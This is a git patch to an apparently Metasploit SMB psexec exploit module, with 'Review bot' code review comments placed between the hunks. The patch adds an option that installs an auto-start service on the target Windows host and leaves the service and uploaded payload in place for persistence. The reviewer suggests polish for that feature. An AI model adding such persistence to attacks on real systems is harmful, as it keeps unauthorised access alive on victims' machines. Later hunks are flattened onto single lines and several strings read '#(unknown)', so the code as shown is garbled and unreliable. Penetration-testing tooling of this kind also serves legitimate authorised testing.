From 2c9209f8b19fa00be5b70695f4e93ec92bf4d323 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Sat, 5 Apr 2014 18:50:49 +0100
Subject: [PATCH] Auto persist

---
 lib/msf/core/exploit/smb/psexec.rb | 26 +++++++++++++++++++++++++-
 modules/exploits/windows/smb/psexec.rb | 20 +++++++++++---------
 2 files changed, 36 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index 1b043195c2..b9981d3241 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -23,18 +23,34 @@ module Exploit::Remote::SMB::Psexec
 OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
 OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
 ], self.class)
+
+ register_advanced_options(
+ [
+ OptBool.new('SERVICE_PERSIST', [ true, 'Create an Auto run service and do not remove it.', false])
+ ], self.class)
 end
 
+ # Retrieve the SERVICE_NAME option, generate a random
+ # one if not already set.
+ #
+ # @return service_name [String] the name of the service.
 def service_name
 @service_name ||= datastore['SERVICE_NAME']
 @service_name ||= rand_text_alpha(8)
 end
 
+ # Retrieve the SERVICE_DISPLAY_NAME option, generate a random
+ # one if not already set.
+ #
+ # @return service_display_name [String] the display name of the service.
 def display_name
 @display_name ||= datastore['SERVICE_DISPLAY_NAME']
 @display_name ||= rand_text_alpha(16)
 end
 
+ # Retrieve the SERVICE_DESCRIPTION option
+ #
+ # @return service_description [String] the service description.
 def service_description
 @service_description ||= datastore['SERVICE_DESCRIPTION']
 end
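Review bot: The three new YARD comments put a name after `@return`, where YARD expects only the type and description, so the rendered docs will show `service_name [String]` as the type; write `# @return [String] the name of the service.` and likewise for `display_name` and `service_description`. The `service_description` tag also promises a String, but `SERVICE_DESCRIPTION` is registered with a nil default in the context lines above and the method has no `rand_text_alpha` fallback, so `# @return [String, nil] the service description, or nil when the option is unset.` is the accurate contract. The new `SERVICE_PERSIST` OptBool is correct as written; its description would read more clearly as `'Create an auto-start service and do not remove it.'`.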
@@ -89,8 +105,14 @@ module Exploit::Remote::SMB::Psexec return false unless scm_handle + if datastore['SERVICE_PERSIST'] + opts = { :start => SERVICE_AUTO_START } + else + opts = {} + end + vprint_status("#{peer} - Creating the service...") - svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, {}) + svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, opts) case svc_status when ERROR_SUCCESS @@ -133,6 +155,8 @@ module Exploit::Remote::SMB::Psexec # Maybe we could have a force cleanup option..? if service_exists print_warning("#{peer} - Not removing service as it already existed...") + elsif datastore['SERVICE_PERSIST'] + print_warning("#{peer} - Not removing service for persistance...") else vprint_status("#{peer} - Removing the service...") svc_status = dce_deleteservice(dcerpc, svc_handle) diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index bbcdb8400b..8e6ce240d6 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb 
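Review bot: The new `if`/`else` that builds `opts` is a four-line assignment of one of two hash literals; a single conditional expression reads better and keeps the variable's definition on one line: `opts = datastore['SERVICE_PERSIST'] ? { :start => SERVICE_AUTO_START } : {}`. `SERVICE_AUTO_START` is not defined anywhere in this hunk — presumably it comes from the same DCERPC mixin that supplies `ERROR_SUCCESS` below — so it is worth confirming the constant is in scope, since a missing one would only surface as a NameError once the option is actually set. The enclosing method starts and ends outside the hunk.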
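Review bot: The new `elsif` branch's warning misspells the word: `print_warning("#{peer} - Not removing service for persistence...")`. Because this branch deliberately leaves an auto-start service registered on the host, the log line is the only record the operator has of what was left behind and must later be cleaned up, so naming it is worthwhile: `print_warning("#{peer} - Not removing service #{service_name} (SERVICE_PERSIST set)...")`, using the `service_name` accessor added in the first hunk. The enclosing cleanup method continues outside the hunk.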
@@ -196,15 +196,17 @@ class Metasploit3 < Msf::Exploit::Remote psexec(file_location, false) - print_status("Deleting \\#(unknown)...") - sleep(1) - #This is not really useful but will prevent double \\ on the wire :) - if datastore['SHARE'] =~ /.[\\\/]/ - simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") - simple.delete("\\#{fileprefix}\\#(unknown)") - else - simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") - simple.delete("\\#(unknown)") + unless datastore['SERVICE_PERSIST'] + print_status("Deleting \\#(unknown)...") + sleep(1) + #This is not really useful but will prevent double \\ on the wire :) + if datastore['SHARE'] =~ /.[\\\/]/ + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + simple.delete("\\#{fileprefix}\\#(unknown)") + else + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + simple.delete("\\#(unknown)") + end end end handler
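Review bot: Both branches of the inner `if` open with the identical `simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")` call, so now that the block is being re-indented under the new `unless` it is the moment to hoist that one line to just after `sleep(1)` and leave the `if`/`else` choosing only between the two `simple.delete` paths. The `#This is not really useful but will prevent double \\ on the wire :)` comment explains the wrong thing; `# Prefix the path with fileprefix only when SHARE already contains a separator, to avoid a double \\ on the wire` states what the regex check decides. The `\\#(unknown)` fragments in the `print_status` and `simple.delete` strings look like extraction damage to an interpolation in this rendering rather than the committed text — verify against the actual source. The enclosing method starts and ends outside the hunk.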